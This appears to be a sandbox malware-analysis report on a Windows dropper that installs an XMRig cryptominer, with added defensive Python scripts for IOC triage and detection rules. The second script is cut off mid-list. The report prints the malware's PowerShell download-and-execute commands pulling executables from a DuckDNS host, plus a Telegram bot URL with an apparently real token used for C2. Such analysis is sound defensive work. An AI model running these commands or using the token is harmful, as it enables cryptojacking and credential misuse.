Source: global traffic HTTP traffic detected: GET /6nif5f8r/address.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g0nv8z1z/creal.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: puredgb.duckdns.org:30000 | Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: puredgb.duckdns.org
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000005.00000002.1528272772.00000237EBE30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftH
Source: 1.exe.15.dr String found in binary or memory: http://decimate.online
Source: 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: http://decimate.onlinehey
Source: powershell.exe, 00000005.00000002.1502923504.00000237D54CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB3AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CCC1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB9330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB91FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1502923504.00000237D50C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CC918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org
Source: powershell.exe, 00000005.00000002.1502923504.00000237D4702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CBF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA4DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, 00000000.00000003.1435018576.000001A2A1CFE000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/6nif5f8r/address.exe
Source: powershell.exe, 00000005.00000002.1502323820.00000237D1CED000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, 00000000.00000003.1435018576.000001A2A1CFE000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe
Source: powershell.exe, 00000034.00000002.1953679928.000001DDA73A8000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe
Source: 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
Source: 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe4
Source: powershell.exe, 00000005.00000002.1502923504.00000237D3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CB331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDA9181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.1502923504.00000237D3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CB331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDA9181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: curl.exe, 00000026.00000002.1708351275.0000020ECD720000.00000004.00000020.00020000.00000000.sdmp, ping.bat.31.dr, tmp.vbs.27.dr String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1502923504.00000237D4702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CBF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA2F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: 1.exe.15.dr String found in binary or memory: https://ibb.co/pjHVbzL).
Source: powershell.exe, 00000005.00000002.1502923504.00000237D54CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB3AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CCC1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB9330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB91FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/benchmark/%s
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/docs/algorithms
Source: 6.exe, 00000006.00000003.1511481148.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511270372.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511784936.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1510430092.000001B664124000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/wizard
Source: 6.exe, 00000006.00000003.1511481148.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511270372.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511784936.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1510430092.000001B664124000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2
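The most actionable strings in this section are the Telegram Bot API URL (a live bot token that doubles as a C2 channel and an exfiltration credential; the TLS session to 149.154.167.220:443 is in Telegram's address range), the puredgb.duckdns.org:30000 download URLs used by the dropper, and the xmrig.com references that identify the miner. The Python script below is an added example, not part of the sandbox report and not code from the malware: it triages "String found in binary or memory" entries, tags Telegram Bot API URLs and masks the secret half of the token, and flags free dynamic-DNS hosts, non-standard ports, direct .exe downloads and XMRig references. The sample strings are constructed to mirror the entries on this page, with a made-up bot token of the right shape instead of the real one; the dynamic-DNS suffix list and the tag names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Telegram Bot API tokens look like "<bot id>:<35 chars of [A-Za-z0-9_-]>".
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d{8,10}):([A-Za-z0-9_-]{35})")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Free dynamic-DNS providers often used for staging (assumed list; extend to taste).
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org", "dyndns.org")
MINER_HOSTS = ("xmrig.com",)
DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed sample in the shape of the report's "String found in binary or memory"
# entries. The bot token is a made-up placeholder of the right shape, not the one on the page.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot1234567890:AAHxYz_abcdefghijklmnopqrstuvwxyz01/sendMessage?chat_id=1",
    "http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe",
    "https://xmrig.com/wizard",
    "https://curl.se/docs/hsts.html",
    "http://www.apache.org/licenses/LICENSE-2.0",
    "https://aka.ms/pscore68",
]


def classify_url(url):
    """Return the set of indicator tags that apply to a single URL (empty set = nothing notable)."""
    tags = set()
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if TELEGRAM_BOT_RE.search(url):
        # A bot token inside a dropper is both a C2 channel and an exfiltration credential.
        tags.update({"telegram-bot-api", "credential:telegram-bot-token"})
    if any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES):
        tags.add("dynamic-dns")
    try:
        port = parts.port
    except ValueError:          # malformed port in a garbled string; treat as absent
        port = None
    if port is not None and port != DEFAULT_PORTS.get(parts.scheme.lower()):
        tags.add("non-standard-port")
    if host in MINER_HOSTS:
        tags.add("cryptominer-reference")
    if parts.path.lower().endswith(".exe"):
        tags.add("executable-download")
    return tags


def redact_bot_token(url):
    """Keep the numeric bot id (useful for pivoting) and mask the secret half of the token."""
    return TELEGRAM_BOT_RE.sub(lambda m: f"api.telegram.org/bot{m.group(1)}:***", url)


def triage(lines):
    """Extract every URL from the given strings and keep those carrying at least one tag."""
    findings = []
    for line in lines:
        for url in URL_RE.findall(line):
            tags = classify_url(url)
            if tags:
                findings.append({"url": redact_bot_token(url), "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_STRINGS):
        print(f["url"], ", ".join(f["tags"]))
```

The token is masked rather than dropped so that the bot id survives in tickets and IOC feeds while the secret does not; the operational step after a finding like this is to report the bot to Telegram, not to query the API with the recovered token.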

System Summary

Source: 6.3.6.exe.1b665fa72bc.1.raw.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000015.00000000.1542891226.00007FF750E91000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\1.exe Dropped file: 2pK[\ r\H8xHH8H8X8@8H8h H`x8bdh(ee`(eHe e( XeXX`ePh.8tXVBj 4R@.f$:\jxxl\L>2*xfXL2n^L>0F xSendMessageWShowWindow)GetDlgItemSetDlgItemTextWEnableWindowSetWindowTextWGetWindowTextWGetWindowTextLengthWfGetParentSetWindowPosGetSystemMetricsGetClientRectGetWindowRectGetWindowLongWSetWindowLongWGetWindowLongPtrWSetProcessDefaultLayoutGetWindowLoadStringW&OemToCharBuffA<CharUpperWDefWindowProcWQRegisterClassExWnCreateWindowExWIsWindowDestroyWindowUpdateWindowMapWindowPointsUCopyRectSetWindowLongPtrWLoadCursorW#GetDCiReleaseDCMessageBoxWFindWindowExWGetClassNameWTCopyImage_GetMessageWTranslateMessageDispatchMessageW7PeekMessageW:PostMessageW.WaitForInputIdleIsWindowVisibleDialogBoxParamWEndDialog,GetDlgItemTextWwSendDlgItemMessageWSetFocusSetForegroundWindow}GetSysColorLoadBitmapWLoadIconWDestroyIconIsDialogMessageW/CreateCompatibleBitmap0CreateCompatibleDCDeleteDCDeleteObjectGetDeviceCapswSelectObjectStretchBlt5CreateDIBSectionGetObjectWG Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1.exe Dropped file: "6Hbx:Pfp|NB`t6JLocalFreeGetLastErrorSetLastErrordFormatMessageWGetCurrentProcessDeviceIoControlxSetFileTimeRCloseHandleRemoveDirectoryWCreateFileWDeleteFileWCreateHardLinkWhGetShortPathNameWGetLongPathNameWeMoveFileWGetFileTypekGetStdHandle4WriteFileReadFile]FlushFileBuffersaSetEndOfFiletSetFilePointerGetCurrentProcessIdCreateDirectoryWoSetFileAttributesWGetFileAttributesW4FindClose?FindFirstFileWKFindNextFileWGetVersionExWGetModuleFileNameW[SetCurrentDirectoryWGetCurrentDirectoryWGetFullPathNameWbFoldStringWGetModuleHandleWTFindResourceWhFreeLibraryLGetProcAddress#ExpandEnvironmentStringsWExitProcessSetThreadExecutionStateSleepALoadLibraryWwGetSystemDirectoryWdCompareStringWAllocConsoleeFreeConsoleAttachConsole3WriteConsoleWMGetProcessAffinityMaskCreateThreadSetThreadPriorityInitializeCriticalSectionEnterCriticalSection;LeaveCriticalSectionDeleteCriticalSectiongSetEventResetEventReleaseSemaphoreWaitForSingleObjectCreateEventWCreateSemaphoreW~GetSystemTimeSystemTimeToTzSpecificLocalTimeTzSpecificLocalTimeToSystemTimeSystemTimeToFileTime*FileTimeToLocalFileTimeHLocalFileTimeToFileTime+FileTimeToSystemTimexGetCPInfoIsDBCSLeadByteiMultiByteToWideChar WideCharToMultiByteGlobalAllocVLockResourceGlobalLockGlobalUnlockGlobalFreeGlobalMemoryStatusExCLoadResourceSizeofResourceGetTimeFormatWGetDateFormatWGetExitCodeProcessGetLocalTimeGetTickCountYMapViewOfFileUnmapViewOfFileCreateFileMappingW{OpenFileMappingWGetCommandLineWeSetEnvironmentVariableWGetTempPathWbMoveFileExWGetLocaleInfoW:GetNumberFormatWKERNEL32.dllOLEAUT32.dll!GdipAllocGdipFree6GdipCloneImageGdipDisposeImageQGdipCreateBitmapFromStream_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dllRaiseExceptionzGetSystemInfoVirtualProtectVirtualQuery?LoadLibraryExARtlCaptureContextRtlLookupFunctionEntry&RtlVirtualUnwindUnhandledExceptionFilterSetUnhandledExceptionFilterTerminateProcessIsProcessorFeaturePresentInitializeCriticalSectionAndSpinCountWaitForSingleObjectExIsDebuggerPresentjGetStartupInfoWQueryPerformanceCounterGetCurrentThreadIdGetSystemTimeAsFileTimeInitializeSListHead!RtlPcToFileHeader%RtlUnwindExEncodePointerTlsAllocTlsGetValueTlsSetValueTlsFree@LoadLibraryExWQueryPerformanceFrequencyGetModuleHandleExWGetModuleFileNameAnGetACPHeapFreeHeapAllocpGetStri Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\1.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\2.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\ProgramData\Drivers\xmrig.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329C308: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF73329C308
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys Jump to behavior
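The execution chain recorded above is wscript.exe spawning cmd.exe to run a .bat from Temp or C:\ProgramData\Drivers, cmd.exe spawning powershell.exe, and PowerShell forcing TLS 1.2, fetching xmr.exe, discord.exe and xeno.exe from puredgb.duckdns.org:30000 into AppData\Roaming and running each download in the same command line; 6.exe then writes WinRing0x64.sys to C:\ProgramData\Drivers. The script below is an added example, not taken from the report and not code from the malware: it encodes those three behaviours as rules over Sysmon-style process-creation and file-creation events and runs them over events constructed to mirror the page's command lines, plus one benign control. The Event shape, rule names, the two-trait threshold for the download cradle and the dynamic-DNS list are assumptions; the WinRing0 note relies on XMRig bundling that driver for MSR access.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (Sysmon EID 1 / Security 4688) or "file" (Sysmon EID 11)
    image: str           # process image; for "file" events, the process that wrote the file
    parent: str = ""     # parent image (process events)
    cmdline: str = ""    # command line (process events)
    target: str = ""     # path written (file events)


# Constructed events mirroring the chain in this report, plus one benign control at the end.
EVENTS = [
    Event("process", "C:\\Windows\\System32\\cmd.exe",
          parent="C:\\Windows\\System32\\wscript.exe",
          cmdline='C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\user\\AppData\\Local\\Temp\\down.bat" "'),
    Event("process", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          parent="C:\\Windows\\System32\\cmd.exe",
          cmdline="powershell -c \"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
                  "Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' "
                  "-OutFile 'C:\\Users\\user\\AppData\\Roaming\\6.exe'; C:\\Users\\user\\AppData\\Roaming\\6.exe\""),
    Event("file", "C:\\Users\\user\\AppData\\Roaming\\6.exe",
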